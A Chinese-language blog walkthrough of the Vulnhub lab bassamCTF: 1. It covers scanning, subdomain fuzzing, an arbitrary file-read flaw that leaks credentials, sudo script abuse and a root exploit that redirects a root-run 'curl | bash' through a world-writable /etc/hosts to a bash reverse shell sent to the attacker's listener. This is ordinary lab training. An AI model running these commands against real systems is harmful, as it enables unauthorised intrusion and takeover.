标签：Status 10.1 1.144 kali Vulnhub BassamCTF 靶机 kira Size

BassamCTF

靶机信息

名称：bassamCTF: 1

地址：

https://www.vulnhub.com/entry/bassamctf-1,631/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts                                                                                            

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.144      00:0c:29:d9:5e:2b      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:fd:b0:49      1      60  VMware, Inc.                                                                                             

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为10.1.1.144

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.144 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-12 03:06 EST
Nmap scan report for localhost (10.1.1.144)
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5fcd98ac0e76bed09cae23478d03b507 (RSA)
|   256 f5cbdef089dcff568944053ca3448f70 (ECDSA)
|_  256 3a94cc9eaaab7d647126494802076230 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:D9:5E:2B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

NMAP扫描结果表明目标主机有2个开放端口：22（SSH）、80（HTTP）

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://10.1.1.144/                                                                                                
<!-- bassam.ctf --> 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://10.1.1.144/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.1.1.144 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ nikto -h http://10.1.1.144
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.144
+ Target Hostname:    10.1.1.144
+ Target Port:        80
+ Start Time:         2023-02-12 03:09:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-12 03:10:04 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto工具没有带来有价值的信息。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 03:10:41 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1097886 / 1102805 (99.55%)
===============================================================
2023/02/12 03:12:10 Finished
===============================================================

──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 03:12:22 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
Progress: 708055 / 708545 (99.93%)
===============================================================
2023/02/12 03:13:23 Finished
===============================================================

──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.txt,.sh
                        tomcat.txt                                  
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2023/02/12 04:05:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
Progress: 107501 / 311425 (34.52%)[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.sh": net/url: invalid control character in URL
Progress: 119022 / 311425 (38.22%)[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.php": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
Progress: 308640 / 311425 (99.11%)
===============================================================
2023/02/12 04:05:40 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:04 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
Progress: 95606 / 280825 (34.04%)[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.txt": net/url: invalid control character in URL
Progress: 101728 / 280825 (36.22%)[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.sh": net/url: invalid control character in URL
/index.html           (Status: 200) [Size: 21]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
Progress: 277116 / 280825 (98.68%)
===============================================================
2023/02/12 04:06:27 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.txt,.sh
                          tomcat.txt                                  
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:40 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.sh         (Status: 403) [Size: 275]
/.htaccess.sh         (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
Progress: 98617 / 102385 (96.32%)
===============================================================
2023/02/12 04:06:49 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:59 Starting gobuster in directory enumeration mode
===============================================================
/.hta.php             (Status: 403) [Size: 275]
/.hta                 (Status: 403) [Size: 275]
/.hta.txt             (Status: 403) [Size: 275]
/.hta.html            (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.hta.sh              (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htaccess.sh         (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.sh         (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
Progress: 23045 / 23570 (97.77%)
===============================================================
2023/02/12 04:07:01 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ dirb http://10.1.1.144

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb 12 04:07:13 2023
URL_BASE: http://10.1.1.144/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.1.1.144/ ----
+ http://10.1.1.144/index.html (CODE:200|SIZE:21)                                                                                                           
+ http://10.1.1.144/server-status (CODE:403|SIZE:275)                                                                                                       
                                                                                                                                                            
-----------------
END_TIME: Sun Feb 12 04:07:16 2023
DOWNLOADED: 4612 - FOUND: 2

目录扫描一无所获。

这个bassam.ctf可能是域名，晕

访问: http://bassam.ctf， 返回内容发生变化：Welcome to my blog

接下来爆破子域名：

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ wfuzz -u http://bassam.ctf -H "Host:FUZZ.bassam.ctf" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 3
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://bassam.ctf/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000689:   400        12 L     53 W       422 Ch      "gc._msdcs"                                                                                 
000001000:   200        3 L      6 W        38 Ch       "welcome"                                                                                   
000003851:   200        1 L      3 W        21 Ch       "origin-images"    

爆破出子域名： welcome,将其加入/etc/hosts文件中去：

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo vim /etc/hosts
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.1.1.144      bassam.ctf
10.1.1.144      welcome.bassam.ctf

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://welcome.bassam.ctf   
<html>
<!--open your eyes -->
</html>

──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://welcome.bassam.ctf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://welcome.bassam.ctf
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/02/12 04:32:27 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 283]
/index.php            (Status: 200) [Size: 229]
/index.html           (Status: 200) [Size: 38]
/.html                (Status: 403) [Size: 283]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 283]
/.html                (Status: 403) [Size: 283]
/server-status        (Status: 403) [Size: 283]
Progress: 1099675 / 1102805 (99.72%)
===============================================================
2023/02/12 04:34:07 Finished
===============================================================

扫描出/index.php文件，可以输入url，然后下载

在输入框，只输入index.php，然后下载文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ mv ~/Downloads/index.php .
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat index.php                 
<?php
if($_SERVER['REQUEST_METHOD'] === 'POST'):
    $image = $_POST['url'];
    if($check === false):
    echo 'Error';
    else:
        $file = $image ;
        if (file_exists($file)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($file).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file));
            readfile($file);
            exit;
        }
    endif;
endif;

?>

<html>
<body>

<form action="" method="post">
url <input type=text name=url placeholder="image_url...">
<input type=submit value="download">
<!--https://github.com/kira2040k/MYCTF/blob/main/index.php-->
</form>

</body>
</html>
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ 

在目录扫描的时候发现了config.php文件，通过这个url下载，将其文件下载到Kali Linux本地

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ mv ~/Downloads/config.php .
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat config.php 
<?php
$user='test';
$pass='test123';
?>

会不会是ssh用户名和密码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ ssh [email protected] 
The authenticity of host '10.1.1.144 (10.1.1.144)' can't be established.
ED25519 key fingerprint is SHA256:dElyCVED7FsqAhIBr7iBf2cIJv3xABqqPAY2ypUxHRY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.144' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Feb 12 09:40:08 UTC 2023

  System load:  0.01               Processes:            160
  Usage of /:   23.5% of 19.56GB   Users logged in:      0
  Memory usage: 48%                IP address for ens33: 10.1.1.144
  Swap usage:   0%


33 packages can be updated.
0 updates are security updates.


Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ 

$ ls -alh /var/www/ctf/MySecretPassword
-rw-r--r-- 1 root root 628 Dec 13  2020 /var/www/ctf/MySecretPassword
$ cd /home
$ ls -alh
total 20K
drwxr-xr-x  5 root   root   4.0K Dec 13  2020 .
drwxr-xr-x 25 root   root   4.0K Dec 13  2020 ..
drwxr-xr-x  2 bassam bassam 4.0K Dec 13  2020 bassam
drwxr-xr-x  5 kira   kira   4.0K Dec 13  2020 kira
drwxr-xr-x  4 test   test   4.0K Dec 13  2020 test
$ cd bassam
$ ls -alh
total 24K
drwxr-xr-x 2 bassam bassam 4.0K Dec 13  2020 .
drwxr-xr-x 5 root   root   4.0K Dec 13  2020 ..
-rw-r--r-- 1 bassam bassam  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 bassam bassam 3.7K Apr  4  2018 .bashrc
-rwxr-xr-x 1 root   root     47 Dec 13  2020 down.sh
-rw-r--r-- 1 bassam bassam  807 Apr  4  2018 .profile
$ cat down.sh
curl "http://mywebsite.test/script.sh" |bash 

$ pwd
/home/bassam
$ cd ..
$ cd kira
$ ls -alh
total 40K
drwxr-xr-x 5 kira kira 4.0K Dec 13  2020 .
drwxr-xr-x 5 root root 4.0K Dec 13  2020 ..
-rw------- 1 kira kira  162 Dec 13  2020 .bash_history
-rw-r--r-- 1 kira kira  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 kira kira 3.7K Apr  4  2018 .bashrc
drwx------ 2 kira kira 4.0K Dec 13  2020 .cache
drwx------ 3 kira kira 4.0K Dec 13  2020 .gnupg
drwxrwxr-x 3 kira kira 4.0K Dec 13  2020 .local
-rw-r--r-- 1 kira kira  807 Apr  4  2018 .profile
-rw-r--r-- 1 kira kira    0 Dec 13  2020 .sudo_as_admin_successful
-rwxr-xr-x 1 root root   78 Dec 13  2020 test.sh
$ cat test.sh
echo 'your name'
read name
echo  $name >/home/kali/message.txt
$1 2>/dev/null
$ 

test@kira:/PassProgram$ ./decoder /var/www/ctf/MySecretPassword 
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE
test@kira:/PassProgram$ 

这应该是用户kira的密码

test@kira:/PassProgram$ su - kira
Password: 
kira@kira:~$ id
uid=1000(kira) gid=1000(kira) groups=1000(kira),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
kira@kira:~$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on kira:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kira may run the following commands on kira:
    (bassam) /home/kira/test.sh
kira@kira:~$ 

kira@kira:~$ sudo -u bassam /home/kira/test.sh /bin/bash
your name
id
/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
bash -i
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
/home/kira
/home/kira

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo vim /etc/hosts            
[sudo] password for kali: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat /etc/hosts                
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.1.1.144      bassam.ctf
10.1.1.144      welcome.bassam.ctf
10.1.1.143      mywebsite.test

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ vim script.sh
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat script.sh 
bash -i >& /dev/tcp/10.1.1.143/5555 0>&1
                                               

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kira

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ls -alh /etc/hosts
-rwxrwxrwx 1 root root 219 Dec 13  2020 /etc/hosts
echo '10.1.1.143     mywebsite.test' >> /etc/hosts
sudo /home/bassam/down.sh

执行脚本实现提权

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo nc -nlvp 5555                                     
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.144] 58232
root@kira:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@kira:~# ls -alh
ls -alh
total 40K
drwxr-xr-x 5 kira kira 4.0K Dec 13  2020 .
drwxr-xr-x 5 root root 4.0K Dec 13  2020 ..
-rw------- 1 kira kira  276 Feb 12 10:11 .bash_history
-rw-r--r-- 1 kira kira  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 kira kira 3.7K Apr  4  2018 .bashrc
drwx------ 2 kira kira 4.0K Dec 13  2020 .cache
drwx------ 3 kira kira 4.0K Dec 13  2020 .gnupg
drwxrwxr-x 3 kira kira 4.0K Dec 13  2020 .local
-rw-r--r-- 1 kira kira  807 Apr  4  2018 .profile
-rw-r--r-- 1 kira kira    0 Dec 13  2020 .sudo_as_admin_successful
-rwxr-xr-x 1 root root   78 Dec 13  2020 test.sh
root@kira:~# cd /root
cd /root
root@kira:/root# ls -alh
ls -alh
total 32K
drwx------  5 root root 4.0K Dec 13  2020 .
drwxr-xr-x 25 root root 4.0K Dec 13  2020 ..
-rw-------  1 root root 1.7K Dec 13  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Dec 13  2020 Encoder
drwxr-xr-x  3 root root 4.0K Dec 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Dec 13  2020 .ssh
root@kira:/root#     

经验教训

1. bassam.ctf应该可以联想到这是域名

2. 如果域名，那么需要联系到子域名挖掘，可以用wfuzz工具扫描

标签：Status,10.1,1.144,kali,Vulnhub,BassamCTF,靶机,kira,Size
From： https://www.cnblogs.com/jason-huawen/p/17114405.html